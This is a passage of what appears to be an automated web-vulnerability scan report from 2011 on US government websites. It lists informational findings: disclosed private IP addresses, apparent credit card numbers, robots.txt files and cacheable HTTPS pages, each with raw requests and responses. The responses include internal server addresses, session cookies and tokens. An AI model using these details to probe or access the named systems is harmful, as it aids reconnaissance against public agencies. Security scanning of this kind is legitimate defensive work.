<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

23.25. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/MenuItems/GeneralInfoFaq.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /compass.web/MenuItems/GeneralInfoFaq.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 53795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<a id="ctl00_ContentPlaceHolder1_HyperLink55" href="http://www.agriculture.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_24476_10297_0_43/http%3B/10.41.0.36/AgWebsite/ProgramDetail.aspx?name=Emergency-Food-Assistance-Program-(TEFAP)&amp;navid=12&amp;parentnavid=0&amp;palid=14&amp;" target="_blank">
...[SNIP]...

23.26. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myhealth.va.gov
Path:   /mhv-portal-web/anonymous.portal

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /mhv-portal-web/anonymous.portal HTTP/1.1
Host: www.myhealth.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:37 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Pragma: No-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-wily-servlet: Clear appServerIp=10.224.43.30&agentName=mhvma_ms10b&servletName=PortalServlet&agentHost=vamhvapp16&agentProcess=WebLogic
Set-Cookie: JSESSIONID=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
X-wily-info: Clear guid=A66BDECC0AE02B1E0053836AAA14FF5A
Connection: close
Set-Cookie: TSd0b0d9=f8f48700ac5e28f4a998bfb011b276dc9b3028ce4c2a4a934dbc0308; Path=/
Content-Length: 22826


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title>My HealtheVet </title><meta name="bea-portal-me
...[SNIP]...

23.27. http://www.ncesc.com/lmi/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncesc.com
Path:   /lmi/default.asp

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /lmi/default.asp HTTP/1.1
Host: www.ncesc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: ARPT=YZQJJVS172.17.100.224CKOOW; path=/
Content-Length: 161
Content-Type: text/html
Location: https://www.ncesc1.com/LMI/default.asp
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:39:21 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.ncesc1.com/LMI/default.asp">here</a></body>

24. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:


24.1. http://data.ok.gov/views/INLINE/rows.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The following credit card number was disclosed in the response:

Request

POST /views/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:00 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 33517

{"data":{
"data" : [ [ 20, "1FDF45FE-0DCD-42D2-8234-B2A058209868", 20, 1294153299, "390706", 1297349709, "390706", "{}", "Smart Start, Inc., (800) 880-3394", "Action Communications, LLC", "1710 W. H
...[SNIP]...
K) Ltd.", "3424 S. Lakeside Drive", "Oklahoma City", "OK", "73179", "405-685-2522", [ "{\"address\":\"3424 S. Lakeside Drive\",\"city\":\"Oklahoma City\",\"state\":\"OK\",\"zip\":\"73179-8428\"}", "35.4307609463117", "-97.6025832716147", null, false ], "National Interlock Service (OK) Ltd., 3424 S. Lakeside Drive, Oklahoma City, OK, 73179, (405) 685-2522", [ ] ]
, [ 44, "2558BF29-25FB-41F6-BB23-659FCA6D7DDE", 44
...[SNIP]...

24.2. http://maps.google.com/maps/sf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/sf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /maps/sf?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_LIBRARIES.kml&start=150&jsv=310c&vps=1&source=maps_api&callback=_xdc_._lgn3tnqv3 HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:51 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:51 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 74286

_xdc_._lgn3tnqv3 && _xdc_._lgn3tnqv3({"name":"http://www.alabama.gov/rss/maps_LIBRARIES.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat: 0.
...[SNIP]...
6thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,rapenabled:false,mmenabled:false},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"P",fid:"g407984c9bc897f0e",latlng:{lat:34.96942,lng:-87.370581000000001},image:"http://www.alabama.gov/images/mapMarkers/LIBRARIES_icon.png",ext:{width:32,height:32,shadow:"",shadow_width:59,shadow_height:32,mask:false},drg:false,laddr:"Burchell Campbell Library @34.96942
...[SNIP]...
6thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,rapenabled:false,mmenabled:false},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"X",fid:"gcad30635a6b0599e",latlng:{lat:32.64913,lng:-85.376014999999995},image:"http://www.alabama.gov/images/mapMarkers/LIBRARIES_icon.png",ext:{width:32,height:32,shadow:"",shadow_width:59,shadow_height:32,mask:false},drg:false,laddr:"Lewis Cooper Jr. Memorial Library @
...[SNIP]...

24.3. http://www.portal.state.pa.us/portal/server.pt/document/852822/10-06-30_2010-11_gf_tr__web_version_pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.portal.state.pa.us
Path:   /portal/server.pt/document/852822/10-06-30_2010-11_gf_tr__web_version_pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /portal/server.pt/document/852822/10-06-30_2010-11_gf_tr__web_version_pdf HTTP/1.1
Host: www.portal.state.pa.us
Proxy-Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hb0moyew3nvxld45vyymmf45

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Disposition: attachment; filename=10-06-30%202010-11%20GF%20TR%20_Web%20version.pdf
X-POWERED-BY: ASP.NET
Content-Language: en
PTGW-STREAMING: Yes
X-ASPNET-VERSION: 2.0.50727
Cache-Control: private
Expires: Sat, 30 Apr 2011 00:38:05 GMT
Content-Type: application/pdf
Content-Length: 107098

%PDF-1.4%....
72 0 obj<</Linearized 1/L 107098/O 74/E 11993/N 22/T 105611/H [ 736 358]>>endobj
xref
72 22
0000000016 00000 n
0000001094 00000 n
0000001175 00000 n
0000001356
...[SNIP]...
</Subtype/TrueType/FontDescriptor 80 0 R/LastChar 122/Widths[278 0 0 0 556 0 0 238 0 0 0 584 278 333 0 278 556 556 556 556 556 556 556 556 556 556 0 0 0 0 0 0 0 722 722 722 722 667 611 778 722 278 556 0 611 833 722 778 667 0 722 667 611 722 667 944 0 667 0 333 0 333 0 0 0 556 611 556 611 556 333 611 611 278 0 0 278 889 611 611 611 611 389 556 333 611 556 778
...[SNIP]...

25. Robots.txt file  previous  next
There are 6 instances of this issue:


25.1. http://in.gov/core/js/arss.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/arss.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: in.gov

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:33:31 GMT
Server: Apache
Last-Modified: Thu, 17 Feb 2011 22:40:56 GMT
ETag: "ae80d3-d2-49c821736ee00"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:34:31 GMT; path=/

# robots.txt for http://www.IN.gov/


User-agent: *

Disallow: /serv/

Disallow: /apps/

Disallow: /cgi-bin/

Disallow: /isdh/drafts_local/

Disallow: /demand

Disallow: /search

Disallow: /
...[SNIP]...

25.2. http://mi.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mi.gov

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 Mar 2010 14:28:53 GMT
ETag: "143c-16e-eefc5340"
Accept-Ranges: bytes
Content-Length: 366
Cache-Control: public, max-age=86400
Connection: close
Content-Type: text/plain

# robots.txt for http://www.michigan.gov
User-agent: *
Disallow: /minewswire/
Disallow: /printerFriendly/
Disallow: /textonly/
Disallow: /rss/
Disallow: /wml/
Disallow: /emailthispage/
Disallow: /podc
...[SNIP]...

25.3. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wt-sdc-01.ai.org
Path:   /dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wt-sdc-01.ai.org

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:be7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:33:18 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.
# $DateTime: 2006/02/08 13:22:46 $
#
######################
...[SNIP]...

25.4. http://www.governor.nh.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governor.nh.gov
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.governor.nh.gov

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:36:43 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 10:00:00 GMT
ETag: "6b81ba-112-4218a800"
Accept-Ranges: bytes
Content-Length: 274
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /storage/
Disallow: /Templates/
Disallow: /graphics/
Disallow: /cgi_bin/
Disallow: /htdig/

Us
...[SNIP]...

25.5. http://www.nh.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nh.gov
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nh.gov

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:36:33 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 10:00:00 GMT
ETag: "77005f-2d2-4218a800"
Accept-Ranges: bytes
Content-Length: 722
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /cgi_bin/
Disallow: /css/
Disallow: /error/
Disallow: /forecast/backgrounds/
Disallow: /forecast/images/
Disallow:
...[SNIP]...

25.6. http://www.vsea.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vsea.org

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:53 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 21 Jan 2009 20:06:09 GMT
ETag: "20181dc-65c-46103afcbae40"
Accept-Ranges: bytes
Content-Length: 1628
Cache-Control: max-age=1209600
Expires: Fri, 13 May 2011 22:12:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26. Cacheable HTTPS response  previous  next
There are 79 instances of this issue:


26.1. https://app.mobilestorm.com/cp/manageforms/preview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://app.mobilestorm.com
Path:   /cp/manageforms/preview.php

Request

GET /cp/manageforms/preview.php HTTP/1.1
Host: app.mobilestorm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8

Invalid Subscriber Form.

26.2. https://apps.tn.gov/biztax-app/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /biztax-app/login.html

Request

GET /biztax-app/login.html HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2889
Set-Cookie: JSESSIONID=5917367B2BC078AE01FCE9F4DDCB78BA.portalprod1; Path=/biztax-app
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- InstanceBegin templa
...[SNIP]...

26.3. https://apps.tn.gov/biztax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /biztax/

Request

GET /biztax/ HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:56 GMT
Server: Apache
Last-Modified: Sun, 24 Apr 2011 16:38:03 GMT
ETag: "1806d-12b9-4a1acb6f810c0"
Accept-Ranges: bytes
Content-Length: 4793
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- InstanceBegin templa
...[SNIP]...

26.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Request

GET /PGM/ASP/SC020.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQADQAB=EFPDNOPBJHAIFLCHBDHBDKEP; path=/
Cache-control: private


26.5. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

Request

GET /PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=&hdn_Error=71602
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:15:09 GMT; path=/
Content-Length: 192807
Content-Type: application/pdf
Last-Modified: Wed, 19 May 2010 20:32:37 GMT
Accept-Ranges: bytes
ETag: "96f09f6b92f7ca1:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:42:44 GMT

%PDF-1.5%....
7 0 obj <</Linearized 1/L 192807/O 12/E 187432/N 1/T 192607/H [ 1176 235]>>endobj
xref
7 44
0000000016 00000 n
0000001411 00000 n
0000001546 00000 n
0000001176 0
...[SNIP]...

26.6. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs02
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Sat, 30 Apr 2011 12:19:17 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...

26.7. https://dotax.ehawaii.gov/efile/css/stylesheet.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dotax.ehawaii.gov
Path:   /efile/css/stylesheet.css

Request

GET /efile/css/stylesheet.css HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Referer: https://dotax.ehawaii.gov/efile/user
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CC4CD27F387886491A0AF28102E7A11F.lono; __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:01 GMT
Server: Apache-Coyote/1.1
ETag: W/"2077-1283504224000"
Last-Modified: Fri, 03 Sep 2010 08:57:04 GMT
Content-Type: text/css
Content-Length: 2077
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


<!-- style sheet -->
<!-- 2.1.6 Friday, August 10, 2001 10:09:24 PM added times --><!-- Friday, August 24, 2001 1:55:39 PM added left and right -->
<style type="text/css">
<!--
body, td, p { font-siz
...[SNIP]...

26.8. https://dotax.ehawaii.gov/efile/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dotax.ehawaii.gov
Path:   /efile/user

Request

POST /efile/user HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Referer: https://www.ehawaii.gov/efile/
Cache-Control: max-age=0
Origin: https://www.ehawaii.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral
Content-Length: 78

SESSION_ID=&CURRSTATE=com.hic.dotax.user.gui.Login&SSN=&PASSWORD=&SUBMIT=Login

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4969BAED74BE5E78E258F5BA163F8473.lono; Path=/efile
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 7156

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

26.9. https://dotax.ehawaii.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dotax.ehawaii.gov
Path:   /favicon.ico
